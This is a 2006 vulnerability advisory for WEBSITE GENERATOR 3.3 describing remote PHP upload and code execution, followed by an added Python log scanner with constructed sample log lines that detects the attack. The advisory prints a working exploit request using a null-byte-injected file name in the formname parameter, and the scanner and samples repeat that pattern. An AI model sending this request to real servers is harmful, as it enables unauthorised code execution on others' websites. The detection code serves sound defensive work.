NSA Group Security Advisory NSAG-№202-25.02.2006 Vulnerability WEBSITE GENERATOR 3.3

2006-02-26T00:00:00
ID SECURITYVULNS:DOC:11601
Type securityvulns
Reporter Securityvulns
Modified 2006-02-26T00:00:00

Description

Advisory: NSAG-№202-25.02.2006

Research: NSA Group [Russian company on Audit of safety & Network security]

Site of Research: http://www.nsag.ru or http://www.nsag.org

Product: WEBSITE GENERATOR 3.3

Site of manufacturer: http://freehostshop.com

Status:
19/11/2005 - Publication is postponed.
19/11/2005 - Manufacturer is not notified (there is no communication).
17/02/2006 - Publication of vulnerability.

Original Advisory: http://www.nsag.ru/vuln/894.html

Risk: Hide

Description: A remote user can upload a PHP script from another server and execute custom PHP code on the web server.

Exploit:
Method GET: http://example.com/files/myforms/process3.php?formname=attack.php%00*name[0]=
Link: http://example.com/files/myforms/forms/attack.php

More information: http://www.nsag.ru/vuln/894.html
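A log check for the request pattern shown above, as an added example that is not part of the original advisory: it flags process3.php requests whose formname carries a null byte or a script extension, and later fetches of the same file name from the forms/ directory. The log lines are constructed samples; the combined log format and the helper name scan are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [26/Feb/2006:10:00:01 +0000] "GET /files/myforms/process3.php?formname=contact&name[0]=Bob HTTP/1.1" 200 512',
    '203.0.113.9 - - [26/Feb/2006:10:02:13 +0000] "GET /files/myforms/process3.php?formname=attack.php%00*name[0]= HTTP/1.1" 200 310',
    '203.0.113.9 - - [26/Feb/2006:10:02:20 +0000] "GET /files/myforms/forms/attack.php HTTP/1.1" 200 45',
    '198.51.100.7 - - [26/Feb/2006:10:05:00 +0000] "GET /index.html HTTP/1.1" 200 1024',
]

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SCRIPT_EXT_RE = re.compile(r'\.(php\d?|phtml|phar)$', re.I)


def scan(lines):
    """Return a list of (client_ip, reason, file_name) findings."""
    findings = []
    planted = set()  # file names seen in suspicious formname values
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        url = urlsplit(target)
        if url.path.endswith("/process3.php"):
            for key, value in parse_qsl(url.query, keep_blank_values=True):
                if key != "formname":
                    continue
                # Text before a decoded %00 is the name a truncating file API would use.
                name = value.split("\x00", 1)[0]
                if "\x00" in value:
                    findings.append((ip, "null byte in formname", name))
                    planted.add(name)
                elif SCRIPT_EXT_RE.search(name):
                    findings.append((ip, "script extension in formname", name))
                    planted.add(name)
        elif "/myforms/forms/" in url.path:
            fname = url.path.rsplit("/", 1)[1]
            if fname in planted:
                findings.append((ip, "fetch of file named in earlier formname", fname))
            elif SCRIPT_EXT_RE.search(fname):
                findings.append((ip, "script requested from forms directory", fname))
    return findings
```

Running scan(SAMPLE_LOG) reports the second and third sample lines and leaves the ordinary form submission and the index.html request unflagged.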

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

www.nsag.ru «Nemesis» © 2006


Nemesis Security Audit Group © 2006.